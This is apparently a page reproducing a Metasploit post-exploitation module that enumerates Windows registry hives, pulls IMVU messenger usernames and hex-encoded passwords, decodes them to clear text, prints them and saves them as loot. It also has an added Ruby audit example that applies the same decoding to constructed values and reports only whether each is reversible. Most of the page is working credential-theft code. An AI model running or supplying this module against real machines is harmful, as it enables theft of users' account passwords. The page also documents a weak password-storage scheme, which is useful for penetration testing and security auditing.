This module extracts the account password from the IMVU messenger client. It automatically enumerates the
account files used by IMVU on the system and then dumps the
username and decoded password in clear text.
Module Code
Here is the complete Metasploit code for this module.
```ruby
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# Excerpt: the class header, the opening of run and the initialisation of
# `creds` are not included on this page.

    credcount = 0
    # Load the registry hives of user profiles that are not currently loaded
    userhives = load_missing_hives()
    userhives.each do |hive|
      next if hive['HKU'] == nil
      print_status("Looking at Key #{hive['HKU']}") if datastore['VERBOSE']
      subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
      if subkeys.nil? or subkeys.empty?
        print_status("IMVU not installed for this user.")
        next
      end
      user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", "")
      hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", "")
      # Strip quotes and \x escapes, then hex-decode the remaining digits
      decpass = [ hpass.downcase.gsub(/'/,'').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack("H*")
      print_good("User=#{user}, Password=#{decpass}")
      creds << [user, decpass]
      credcount = (credcount + 1)
    end

    # clean up after ourselves
    unload_our_hives(userhives)
    print_status("#{credcount} Credentials were found.")

    if credcount > 0
      print_status("Storing data...")
      path = store_loot(
        'imvu.user.creds', 'text/plain', session,
        creds, 'imvu_user_creds.txt', 'IMVU User Credentials'
      )
      print_status("IMVU user credentials saved in: #{path}")
    end
  end
end
```
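The decode step in the module (strip quotes and \x escapes, then pack("H*")) is plain hex decoding, so the stored value is equivalent to the clear-text password. The following added example, which is not part of the Metasploit module, applies the same normalisation to constructed sample values and reports only whether a value is reversible; the helper names normalise, decode_stored and audit_value are assumptions, and it performs no registry access.

```ruby
# Added example: mirrors the module's decode step on constructed values only.
# normalise, decode_stored and audit_value are hypothetical helper names.

# Normalise the way the module does: lower-case, drop single quotes,
# turn "\xNN" / "xNN" escapes into bare hex digit pairs.
def normalise(stored)
  stored.downcase.gsub(/'/, '').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1')
end

# Returns the decoded string, or nil when the value is missing or is not
# clean hex after normalisation. The module's one-liner has no such guard:
# a nil value raises NoMethodError and stray characters decode to garbage.
def decode_stored(stored)
  return nil if stored.nil? || stored.empty?
  hex = normalise(stored)
  return nil unless hex.match?(/\A(?:[a-f0-9]{2})+\z/)
  [hex].pack('H*')
end

# Audit finding that records reversibility without echoing the secret.
def audit_value(stored)
  plain = decode_stored(stored)
  return { reversible: false, length: 0 } if plain.nil?
  { reversible: true, length: plain.bytesize }
end

# Constructed sample values (not taken from any real account).
SAMPLES = {
  'escaped' => "'\\x68\\x75\\x6e\\x74\\x65\\x72\\x32'",
  'bare'    => '68756E74657232',
  'missing' => nil,
  'junk'    => 'not-hex!'
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each { |name, value| puts "#{name}: #{audit_value(value)}" }
end
```

A value flagged as reversible here needs no key or secret to recover, which is why access to the user's registry hive is enough to read the password.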
Download
Here is the Metasploit download link to this module.